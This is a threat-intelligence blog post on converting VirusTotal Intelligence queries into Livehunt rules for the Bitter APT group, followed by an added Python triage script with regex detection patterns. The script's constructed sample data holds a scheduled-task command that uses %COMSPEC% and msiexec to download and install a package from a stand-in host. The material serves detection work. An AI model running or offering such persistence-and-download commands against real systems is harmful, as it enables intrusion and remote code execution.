The path from VT Intelligence queries to VT Livehunt rules: A CTI analyst approach
This post explains the process you can follow to create a VT Livehunt rule from a VT Intelligence query, a typical task in threat hunting and threat intelligence operations. Let's assume that, as a threat hunter, you created robust VT Intelligence (VTI) queries that get you reliable results without false positives.

Your queries are so good that you run them daily to obtain fresh new samples, which is a tedious job to do manually (pro tip - you can automate this using the API). A good alternative would be converting your VTI query into a LiveHunt rule, so you will be immediately notified every time any uploaded indicator matches your criteria. Unfortunately, there is no automated way to convert intelligence queries into LiveHunt rules (and vice versa), and in some cases it is not even possible to obtain exactly the same results (technical tl;dr - due to limitations of the stored data structure). But do not despair. In this post we are going to show many practical cases of LiveHunt rules based on VT Intelligence queries, how you can do it yourself, and the pros, cons and limitations of this approach.

The perfect query ̶d̶o̶e̶s̶n̶’̶t̶ exist

Bitter APT

Bitter APT is a suspected South Asian cyber espionage threat group. Security researchers like StopMalvertisin, among others, regularly publish information about this actor in both X and VirusTotal community.

To start hunting for files related to Bitter APT, you probably want to subscribe to any attributed VirusTotal collection or the threat actor profile itself.


https://www.virustotal.com/gui/file/1ea9.../community

https://www.virustotal.com/gui/threat-ac...summary

You can also search for what the community is discussing about this APT directly by searching community comments. For example, the following query returns samples related to Bitter APT.

entity:file comment:"Bitter APT"

When checking these samples' behavior we can find interesting patterns that can be used to hunt for other similar ones. For instance, Bitter seems to especially like the "chm" file format, as seen in the initial Twitter/X reference and when calculating Commonalities among these files, along with the use of scheduled tasks to achieve persistence on targeted systems, running the %comspec% environment variable through the created scheduled task to execute msiexec.exe followed by a URL.
...
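The post's "pro tip" is to automate the daily VTI query through the API, and its Bitter APT section distils a behaviour pattern (CHM file, scheduled task, %comspec%, msiexec.exe followed by a URL) that a hunter would screen new results against. The following Python is an added example, not code from the VirusTotal post or from VirusTotal itself: it builds the request for the real v3 `intelligence/search` endpoint, keeps a local set of already-seen hashes so a repeated run only reports new files, and scores each sample's sandbox command lines against those indicators. Network access is replaced by an injectable `fetch_behaviour` callback and constructed sample data; the `type_tag` and `command_executions` field names are assumptions about the v3 file object and `behaviour_summary` responses, and the sample hashes, task names and `example.invalid` URLs are constructed.

```python
import re
from urllib.parse import urlencode

# Real VirusTotal v3 endpoints: VT Intelligence search and a file's sandbox behaviour summary.
VTI_SEARCH_URL = "https://www.virustotal.com/api/v3/intelligence/search"
BEHAVIOUR_SUMMARY_URL = "https://www.virustotal.com/api/v3/files/{sha256}/behaviour_summary"

# The query from the post, run unchanged; new files are found by tracking seen hashes locally.
BITTER_QUERY = 'entity:file comment:"Bitter APT"'

# Indicators distilled from the behaviour pattern described in the post.
SCHTASKS_CREATE = re.compile(r"\bschtasks(?:\.exe)?\b.*?\s/create\b", re.I)
COMSPEC = re.compile(r"%comspec%", re.I)
MSIEXEC_URL = re.compile(r"\bmsiexec(?:\.exe)?\b.*?https?://", re.I)


def build_search_request(query, api_key, limit=50, cursor=None):
    """Return URL and headers for one page of a VTI search (no network call is made here)."""
    params = {"query": query, "limit": limit}
    if cursor:
        params["cursor"] = cursor  # 'cursor' comes from meta.cursor of the previous page
    return {"url": f"{VTI_SEARCH_URL}?{urlencode(params)}",
            "headers": {"x-apikey": api_key}}


def behaviour_indicators(command_lines):
    """Set of Bitter-style indicators observed across a sample's sandbox command lines."""
    hits = set()
    for cmd in command_lines:
        if SCHTASKS_CREATE.search(cmd):
            hits.add("schtasks_create")
        if COMSPEC.search(cmd):
            hits.add("comspec")
        if MSIEXEC_URL.search(cmd):
            hits.add("msiexec_url")
    return hits


def is_bitter_candidate(file_type_tag, command_lines):
    """True when the sample is a CHM and all three behaviour indicators are present."""
    wanted = {"schtasks_create", "comspec", "msiexec_url"}
    return file_type_tag == "chm" and behaviour_indicators(command_lines) == wanted


def triage_search_page(search_page, fetch_behaviour, seen_hashes):
    """Classify the not-yet-seen files on one page of VTI results.

    search_page      : parsed JSON of a v3 intelligence search response
    fetch_behaviour  : callable(sha256) -> parsed JSON of /files/{sha256}/behaviour_summary
    seen_hashes      : set updated in place so daily re-runs only report new files
    Returns (findings, next_cursor).
    """
    findings = []
    for obj in search_page.get("data", []):
        sha256 = obj["id"]
        if sha256 in seen_hashes:
            continue
        seen_hashes.add(sha256)
        file_type = obj.get("attributes", {}).get("type_tag", "")      # assumed field name
        summary = fetch_behaviour(sha256).get("data", {})
        cmds = summary.get("command_executions", [])                   # assumed field name
        findings.append({
            "sha256": sha256,
            "type_tag": file_type,
            "indicators": sorted(behaviour_indicators(cmds)),
            "candidate": is_bitter_candidate(file_type, cmds),
        })
    return findings, search_page.get("meta", {}).get("cursor")


# Constructed sample data (not real VT output) so the block runs offline.
SAMPLE_SEARCH_PAGE = {
    "data": [
        {"id": "a" * 64, "type": "file", "attributes": {"type_tag": "chm"}},
        {"id": "b" * 64, "type": "file", "attributes": {"type_tag": "chm"}},
        {"id": "c" * 64, "type": "file", "attributes": {"type_tag": "docx"}},
    ],
    "meta": {"cursor": "next-page-token"},
}
SAMPLE_BEHAVIOUR = {
    "a" * 64: {"data": {"command_executions": [
        'schtasks /create /sc minute /mo 15 /tn "WinUpdate" '
        '/tr "%COMSPEC% /c msiexec.exe /i http://update.example.invalid/p.msi /q" /f']}},
    "b" * 64: {"data": {"command_executions": [
        'schtasks /create /sc daily /tn Backup /tr "C:\\Tools\\backup.exe"']}},
    "c" * 64: {"data": {"command_executions": [
        'cmd.exe /c msiexec.exe /i https://cdn.example.invalid/x.msi']}},
}


def fake_fetch_behaviour(sha256):
    """Stand-in for the behaviour_summary API call."""
    return SAMPLE_BEHAVIOUR.get(sha256, {"data": {}})


def run_demo():
    seen = set()
    findings, cursor = triage_search_page(SAMPLE_SEARCH_PAGE, fake_fetch_behaviour, seen)
    return findings, cursor, seen


if __name__ == "__main__":
    print(build_search_request(BITTER_QUERY, "<YOUR_API_KEY>"))
    for finding in run_demo()[0]:
        print(finding)
```

Only the first constructed sample is flagged: it is a CHM whose scheduled task runs %COMSPEC% to launch msiexec.exe against a URL, which is the combination the post singles out. The second sample creates a scheduled task but nothing else, and the third calls msiexec with a URL but is not a CHM, so both are reported with their partial indicators rather than as candidates. Persisting `seen_hashes` between runs (a file or a small database) is what turns this into the daily job the post describes.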